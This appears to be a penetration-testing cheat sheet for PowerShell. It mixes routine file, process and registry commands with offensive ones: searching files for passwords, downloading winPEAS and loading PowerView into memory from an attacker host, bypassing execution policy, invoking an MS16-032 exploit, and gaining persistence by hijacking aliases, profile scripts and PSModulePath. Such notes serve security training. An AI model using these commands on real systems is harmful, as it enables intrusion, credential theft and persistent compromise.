Powershell Cmdlets consist out of Verb-Method.
To search for a method, type
Get-Command New-U*
To see all attributes for a Cmdlet, type
Get-LocalUser | Get-Member
To see specific or non-default attributes, type
Get-LocalUser | Select-Object -Property Name,PasswordRequired
- Use
Get-Help $cmdletto get the man page about it. - Add ‑WhatIf to any command to see what it would do.
- To see all attributes, pipe a command through format-list *
- ps | format-list *
- dir | fl *
- The ForEach CommandLet % is very useful:
- ps | % { Write-Host “PID = ” $_.ID }
- The Where CommandLet ?:
- get-service | ? { $_.status ‑eq “running” }
- Directory listing:
- get-childitem ‑recurse $dir
- ls ‑r $dir
- Select only some columns:
- ps | select id
- Find a file on the filesystem with a substring:
- ls ‑r $dir assword | % { echo $_.fullname }
- ls ‑r $dir assword 2>$null | % { echo $_.fullname } // ignores standard errors
- Show all environment variables:
- ls variable:
- echo $varname
- Grep through files:
- select-string ‑path C:\Users\*.* ‑pattern assword 2>$null
- Ping sweep:
- 1..225 | % { echo “10.10.10.$_”; ping ‑n 1 ‑w 100 10.10.10.$_ | select-string ttl }
- Pagination:
- ls ‑r | Out-Host ‑paging
- Output is too large?
(...) | Out-File -FilePath C:\Temp\a.txt
Examples
Directories and files
Get all files in the current directory.
Get-ChildItem
Get all files in the current directory and below.
Get-ChildItem -Recurse
Get all files in the current directory and below and also hidden and system files.
Get-ChildItem -Recurse -System -Hidden
Search for files with a name:
Get-ChildItem -Recurse -ErrorAction SilentlyContinue -Filter "flag.txt"
Get-ChildItem -Recurse -ErrorAction SilentlyContinue -System -Hidden | Select-Object Name, Mode | Where-Object -Property Name -like *abc*
Select only the Filename and Mode column.
Get-ChildItem -Recurse -ErrorAction SilentlyContinue -System -Hidden | Select-Object Name, Mode
Filter only for files which contains abc:
Select-String -Path "C:\path\to\directory*" -Pattern "abs" -Recurse
Search for interesting suffixes:
Get-ChildItem -Path C:\Users\nadine\ -Include .txt,.pdf,.xls,.xlsx,.doc,.docx -File -Recurse -ErrorAction SilentlyContinue
Sort alphabetically
Get-ChildItem -Recurse -ErrorAction SilentlyContinue -System -Hidden | Select-Object Name, Mode | Where-Object -Property Name -like *abc* | Sort-Object
Count how many files are found
(...).count
Network requests
Perform a get request:
Invoke-WebRequest $url
Download files
iwr -uri http://$attacker/winPEASx64.exe -Outfile winPEAS.exe
Privilege escalation
Run a commend as other user:
runas /user:albert cmd
Various
Encode a file to base64
[Convert]::ToBase64String([IO.File]::ReadAllBytes('Desktop\b64.txt'))
Get the PowerShell history
Get-History
Get the path where the history file is stored (usually in the APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt directory of the user)
(Get-PSReadlineOption).HistorySavePath
Command manipulation / filtering
Get only lines from the output which have abc:
Your-Command | Where-Object { $_ -match 'abc' }
Get only lines from the output which does not have abc:
Your-Command | Where-Object { $_ -notmatch 'abc' }
Execute
From a file:
powershell -exec bypass Import-Module .\file.ps1
(After this, call the function to execute it.)
Directly:
powershell -exec bypass -File file.ps1
Other method
powershell -exec bypass -command - < c:\mypath\myscript.ps1
Other method
%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -command "& { . C:\Users\kostas\Desktop\39719.ps1; Invoke-MS16-032 }"
In meterpreter
meterpreter > execute -f "powershell -command \" get-netfirewallrule -all \"" -i
Changing the ExecutionPolicy
The execution policy can be set system-wide or for the current user. Listing the policy state:
Get-ExecutionPolicy -Scope CurrentUser
Setting to unrestricted:
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
Enumeration
Show users
Get-LocalUser
Show network addressess
Get-NetIPAddress
Show processes
Get-Process
Show information about a (executeable?) file
Get-ItemProperty -Path "C:\..\miiserver.exe" | Format-list -Property * -Force
Find only files
Get-ChildItem -Recurse -File
Registry access
The registry can be used as drive and interact with.
PS> cd HKLM:
PS> Get-ChildItem
Loading PS scripts into the memory
With this method, no file has to downloaded on the system.
- Provide the PowerShell script via a HTTP server.
- In PowerShell, download and import it
PS> IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.119.158:8081/PowerView.ps1') - The module can now be used.
Obfuscate
Use Chimera
On Linux
Use https://github.com/PowerShell/PowerShell/releases/ and install it somewhere. Now, use the pwsh command.
Exploiting PowerShell
If something was typed in, Windows tries the followings things in order. Try to redefine something high up in the hierachy so that other tasks/systems/admins which are using these things, perform also other actions.
- Doskey alias
- Alias
- Function
- Cmdlet
- Executable
To gain information from existing scripts on the system, look into the following paths.
C:\scripts$HOME\Documents\WindowsPowerShell$PSHOMEC:\Windows\System32\WindowsPowerShell\...\
The following PS files are automatically executed when a user starts PS. Check if these files exists or if you can create one at one location.
$HOME\Documents\WindowsPowerShell\Profile.ps1$HOME\Documents\Profile.ps1$PSHOME\Microsoft.PowerShell_profile.ps1$PSHOME\Profile.ps1
To archieve persistence you can add a path your control to the $PSModulePath environment variable. This could also be a share on which you have access. The following is taken from SEC660 2.2.
$origpaths = (Get-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\SessionManager\Environmet" -Name PSModulePath).PSModulePath
$newPath = $origpaths + ";C:\Users\...\OneDrive\PowerShell\"
Set-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environmet" -Name PSModulePath -Value $newPath
Leave a Reply
You must be logged in to post a comment.